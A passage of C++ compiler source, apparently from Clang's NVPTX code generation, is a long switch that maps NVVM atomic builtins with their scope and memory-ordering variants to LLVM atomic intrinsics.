return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui);
case NVPTX::BI__nvvm_atom_inc_global_ui:
case NVPTX::BI__nvvm_atom_inc_global_ul:
case NVPTX::BI__nvvm_atom_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i);
case NVPTX::BI__nvvm_atom_dec_global_ui:
case NVPTX::BI__nvvm_atom_dec_global_ul:
case NVPTX::BI__nvvm_atom_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i);
case NVPTX::BI__nvvm_atom_and_global_i:
case NVPTX::BI__nvvm_atom_and_global_l:
case NVPTX::BI__nvvm_atom_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i);
case NVPTX::BI__nvvm_atom_or_global_i:
case NVPTX::BI__nvvm_atom_or_global_l:
case NVPTX::BI__nvvm_atom_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i);
case NVPTX::BI__nvvm_atom_xor_global_i:
case NVPTX::BI__nvvm_atom_xor_global_l:
case NVPTX::BI__nvvm_atom_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i);
case NVPTX::BI__nvvm_atom_cas_global_i:
case NVPTX::BI__nvvm_atom_cas_global_l:
case NVPTX::BI__nvvm_atom_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i);
case NVPTX::BI__nvvm_atom_cta_add_global_i:
case NVPTX::BI__nvvm_atom_cta_add_global_l:
case NVPTX::BI__nvvm_atom_cta_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_add_global_i:
case NVPTX::BI__nvvm_atom_sys_add_global_l:
case NVPTX::BI__nvvm_atom_sys_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_add_global_f:
case NVPTX::BI__nvvm_atom_cta_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_cta);
case NVPTX::BI__nvvm_atom_sys_add_global_f:
case NVPTX::BI__nvvm_atom_sys_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_sys);
case NVPTX::BI__nvvm_atom_cta_xchg_global_i:
case NVPTX::BI__nvvm_atom_cta_xchg_global_l:
case NVPTX::BI__nvvm_atom_cta_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_xchg_global_i:
case NVPTX::BI__nvvm_atom_sys_xchg_global_l:
case NVPTX::BI__nvvm_atom_sys_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_max_global_i:
case NVPTX::BI__nvvm_atom_cta_max_global_l:
case NVPTX::BI__nvvm_atom_cta_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_cta);
case NVPTX::BI__nvvm_atom_cta_max_global_ui:
case NVPTX::BI__nvvm_atom_cta_max_global_ul:
case NVPTX::BI__nvvm_atom_cta_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_cta);
case NVPTX::BI__nvvm_atom_sys_max_global_i:
case NVPTX::BI__nvvm_atom_sys_max_global_l:
case NVPTX::BI__nvvm_atom_sys_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_sys);
case NVPTX::BI__nvvm_atom_sys_max_global_ui:
case NVPTX::BI__nvvm_atom_sys_max_global_ul:
case NVPTX::BI__nvvm_atom_sys_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_sys);
case NVPTX::BI__nvvm_atom_cta_min_global_i:
case NVPTX::BI__nvvm_atom_cta_min_global_l:
case NVPTX::BI__nvvm_atom_cta_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_cta);
case NVPTX::BI__nvvm_atom_cta_min_global_ui:
case NVPTX::BI__nvvm_atom_cta_min_global_ul:
case NVPTX::BI__nvvm_atom_cta_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_cta);
case NVPTX::BI__nvvm_atom_sys_min_global_i:
case NVPTX::BI__nvvm_atom_sys_min_global_l:
case NVPTX::BI__nvvm_atom_sys_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_sys);
case NVPTX::BI__nvvm_atom_sys_min_global_ui:
case NVPTX::BI__nvvm_atom_sys_min_global_ul:
case NVPTX::BI__nvvm_atom_sys_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_sys);
case NVPTX::BI__nvvm_atom_cta_inc_global_ui:
case NVPTX::BI__nvvm_atom_cta_inc_global_ul:
case NVPTX::BI__nvvm_atom_cta_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_cta);
case NVPTX::BI__nvvm_atom_cta_dec_global_ui:
case NVPTX::BI__nvvm_atom_cta_dec_global_ul:
case NVPTX::BI__nvvm_atom_cta_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_inc_global_ui:
case NVPTX::BI__nvvm_atom_sys_inc_global_ul:
case NVPTX::BI__nvvm_atom_sys_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_sys);
case NVPTX::BI__nvvm_atom_sys_dec_global_ui:
case NVPTX::BI__nvvm_atom_sys_dec_global_ul:
case NVPTX::BI__nvvm_atom_sys_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_and_global_i:
case NVPTX::BI__nvvm_atom_cta_and_global_l:
case NVPTX::BI__nvvm_atom_cta_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_and_global_i:
case NVPTX::BI__nvvm_atom_sys_and_global_l:
case NVPTX::BI__nvvm_atom_sys_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_or_global_i:
case NVPTX::BI__nvvm_atom_cta_or_global_l:
case NVPTX::BI__nvvm_atom_cta_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_or_global_i:
case NVPTX::BI__nvvm_atom_sys_or_global_l:
case NVPTX::BI__nvvm_atom_sys_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_xor_global_i:
case NVPTX::BI__nvvm_atom_cta_xor_global_l:
case NVPTX::BI__nvvm_atom_cta_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_xor_global_i:
case NVPTX::BI__nvvm_atom_sys_xor_global_l:
case NVPTX::BI__nvvm_atom_sys_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_sys);
case NVPTX::BI__nvvm_atom_cta_cas_global_i:
case NVPTX::BI__nvvm_atom_cta_cas_global_l:
case NVPTX::BI__nvvm_atom_cta_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_cta);
case NVPTX::BI__nvvm_atom_sys_cas_global_i:
case NVPTX::BI__nvvm_atom_sys_cas_global_l:
case NVPTX::BI__nvvm_atom_sys_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_sys);
case NVPTX::BI__nvvm_atom_acquire_add_global_i:
case NVPTX::BI__nvvm_atom_acquire_add_global_l:
case NVPTX::BI__nvvm_atom_acquire_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_add_global_f:
case NVPTX::BI__nvvm_atom_acquire_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acquire);
case NVPTX::BI__nvvm_atom_acquire_xchg_global_i:
case NVPTX::BI__nvvm_atom_acquire_xchg_global_l:
case NVPTX::BI__nvvm_atom_acquire_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_global_i:
case NVPTX::BI__nvvm_atom_acquire_max_global_l:
case NVPTX::BI__nvvm_atom_acquire_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_global_ui:
case NVPTX::BI__nvvm_atom_acquire_max_global_ul:
case NVPTX::BI__nvvm_atom_acquire_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_global_i:
case NVPTX::BI__nvvm_atom_acquire_min_global_l:
case NVPTX::BI__nvvm_atom_acquire_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_global_ui:
case NVPTX::BI__nvvm_atom_acquire_min_global_ul:
case NVPTX::BI__nvvm_atom_acquire_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_inc_global_ui:
case NVPTX::BI__nvvm_atom_acquire_inc_global_ul:
case NVPTX::BI__nvvm_atom_acquire_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_dec_global_ui:
case NVPTX::BI__nvvm_atom_acquire_dec_global_ul:
case NVPTX::BI__nvvm_atom_acquire_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_and_global_i:
case NVPTX::BI__nvvm_atom_acquire_and_global_l:
case NVPTX::BI__nvvm_atom_acquire_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_or_global_i:
case NVPTX::BI__nvvm_atom_acquire_or_global_l:
case NVPTX::BI__nvvm_atom_acquire_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_xor_global_i:
case NVPTX::BI__nvvm_atom_acquire_xor_global_l:
case NVPTX::BI__nvvm_atom_acquire_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cas_global_i:
case NVPTX::BI__nvvm_atom_acquire_cas_global_l:
case NVPTX::BI__nvvm_atom_acquire_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cta_add_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_add_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_add_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_add_global_f:
case NVPTX::BI__nvvm_atom_acquire_cta_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_global_f:
case NVPTX::BI__nvvm_atom_acquire_sys_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_inc_global_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_global_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_dec_global_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_global_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_inc_global_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_global_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_dec_global_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_global_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_and_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_and_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_and_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_and_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_or_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_or_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_or_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_or_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xor_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xor_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_cas_global_i:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_global_l:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_cas_global_i:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_global_l:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acquire_sys);
case NVPTX::BI__nvvm_atom_release_add_global_i:
case NVPTX::BI__nvvm_atom_release_add_global_l:
case NVPTX::BI__nvvm_atom_release_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_release);
case NVPTX::BI__nvvm_atom_release_add_global_f:
case NVPTX::BI__nvvm_atom_release_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_release);
case NVPTX::BI__nvvm_atom_release_xchg_global_i:
case NVPTX::BI__nvvm_atom_release_xchg_global_l:
case NVPTX::BI__nvvm_atom_release_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_release);
case NVPTX::BI__nvvm_atom_release_max_global_i:
case NVPTX::BI__nvvm_atom_release_max_global_l:
case NVPTX::BI__nvvm_atom_release_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_release);
case NVPTX::BI__nvvm_atom_release_max_global_ui:
case NVPTX::BI__nvvm_atom_release_max_global_ul:
case NVPTX::BI__nvvm_atom_release_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_release);
case NVPTX::BI__nvvm_atom_release_min_global_i:
case NVPTX::BI__nvvm_atom_release_min_global_l:
case NVPTX::BI__nvvm_atom_release_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_release);
case NVPTX::BI__nvvm_atom_release_min_global_ui:
case NVPTX::BI__nvvm_atom_release_min_global_ul:
case NVPTX::BI__nvvm_atom_release_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_release);
case NVPTX::BI__nvvm_atom_release_inc_global_ui:
case NVPTX::BI__nvvm_atom_release_inc_global_ul:
case NVPTX::BI__nvvm_atom_release_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_release);
case NVPTX::BI__nvvm_atom_release_dec_global_ui:
case NVPTX::BI__nvvm_atom_release_dec_global_ul:
case NVPTX::BI__nvvm_atom_release_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_release);
case NVPTX::BI__nvvm_atom_release_and_global_i:
case NVPTX::BI__nvvm_atom_release_and_global_l:
case NVPTX::BI__nvvm_atom_release_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_release);
case NVPTX::BI__nvvm_atom_release_or_global_i:
case NVPTX::BI__nvvm_atom_release_or_global_l:
case NVPTX::BI__nvvm_atom_release_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_release);
case NVPTX::BI__nvvm_atom_release_xor_global_i:
case NVPTX::BI__nvvm_atom_release_xor_global_l:
case NVPTX::BI__nvvm_atom_release_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_release);
case NVPTX::BI__nvvm_atom_release_cas_global_i:
case NVPTX::BI__nvvm_atom_release_cas_global_l:
case NVPTX::BI__nvvm_atom_release_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_release);
case NVPTX::BI__nvvm_atom_release_cta_add_global_i:
case NVPTX::BI__nvvm_atom_release_cta_add_global_l:
case NVPTX::BI__nvvm_atom_release_cta_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_global_i:
case NVPTX::BI__nvvm_atom_release_sys_add_global_l:
case NVPTX::BI__nvvm_atom_release_sys_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_add_global_f:
case NVPTX::BI__nvvm_atom_release_cta_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_global_f:
case NVPTX::BI__nvvm_atom_release_sys_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xchg_global_i:
case NVPTX::BI__nvvm_atom_release_cta_xchg_global_l:
case NVPTX::BI__nvvm_atom_release_cta_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xchg_global_i:
case NVPTX::BI__nvvm_atom_release_sys_xchg_global_l:
case NVPTX::BI__nvvm_atom_release_sys_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_max_global_i:
case NVPTX::BI__nvvm_atom_release_cta_max_global_l:
case NVPTX::BI__nvvm_atom_release_cta_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_max_global_ui:
case NVPTX::BI__nvvm_atom_release_cta_max_global_ul:
case NVPTX::BI__nvvm_atom_release_cta_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_max_global_i:
case NVPTX::BI__nvvm_atom_release_sys_max_global_l:
case NVPTX::BI__nvvm_atom_release_sys_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_max_global_ui:
case NVPTX::BI__nvvm_atom_release_sys_max_global_ul:
case NVPTX::BI__nvvm_atom_release_sys_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_min_global_i:
case NVPTX::BI__nvvm_atom_release_cta_min_global_l:
case NVPTX::BI__nvvm_atom_release_cta_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_min_global_ui:
case NVPTX::BI__nvvm_atom_release_cta_min_global_ul:
case NVPTX::BI__nvvm_atom_release_cta_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_min_global_i:
case NVPTX::BI__nvvm_atom_release_sys_min_global_l:
case NVPTX::BI__nvvm_atom_release_sys_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_min_global_ui:
case NVPTX::BI__nvvm_atom_release_sys_min_global_ul:
case NVPTX::BI__nvvm_atom_release_sys_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_inc_global_ui:
case NVPTX::BI__nvvm_atom_release_cta_inc_global_ul:
case NVPTX::BI__nvvm_atom_release_cta_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_dec_global_ui:
case NVPTX::BI__nvvm_atom_release_cta_dec_global_ul:
case NVPTX::BI__nvvm_atom_release_cta_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_inc_global_ui:
case NVPTX::BI__nvvm_atom_release_sys_inc_global_ul:
case NVPTX::BI__nvvm_atom_release_sys_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_dec_global_ui:
case NVPTX::BI__nvvm_atom_release_sys_dec_global_ul:
case NVPTX::BI__nvvm_atom_release_sys_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_and_global_i:
case NVPTX::BI__nvvm_atom_release_cta_and_global_l:
case NVPTX::BI__nvvm_atom_release_cta_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_and_global_i:
case NVPTX::BI__nvvm_atom_release_sys_and_global_l:
case NVPTX::BI__nvvm_atom_release_sys_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_or_global_i:
case NVPTX::BI__nvvm_atom_release_cta_or_global_l:
case NVPTX::BI__nvvm_atom_release_cta_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_or_global_i:
case NVPTX::BI__nvvm_atom_release_sys_or_global_l:
case NVPTX::BI__nvvm_atom_release_sys_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xor_global_i:
case NVPTX::BI__nvvm_atom_release_cta_xor_global_l:
case NVPTX::BI__nvvm_atom_release_cta_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xor_global_i:
case NVPTX::BI__nvvm_atom_release_sys_xor_global_l:
case NVPTX::BI__nvvm_atom_release_sys_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_cas_global_i:
case NVPTX::BI__nvvm_atom_release_cta_cas_global_l:
case NVPTX::BI__nvvm_atom_release_cta_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_cas_global_i:
case NVPTX::BI__nvvm_atom_release_sys_cas_global_l:
case NVPTX::BI__nvvm_atom_release_sys_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_release_sys);
case NVPTX::BI__nvvm_atom_acq_rel_add_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_add_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_add_global_f:
case NVPTX::BI__nvvm_atom_acq_rel_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xchg_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_max_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_max_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_min_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_global_ui:
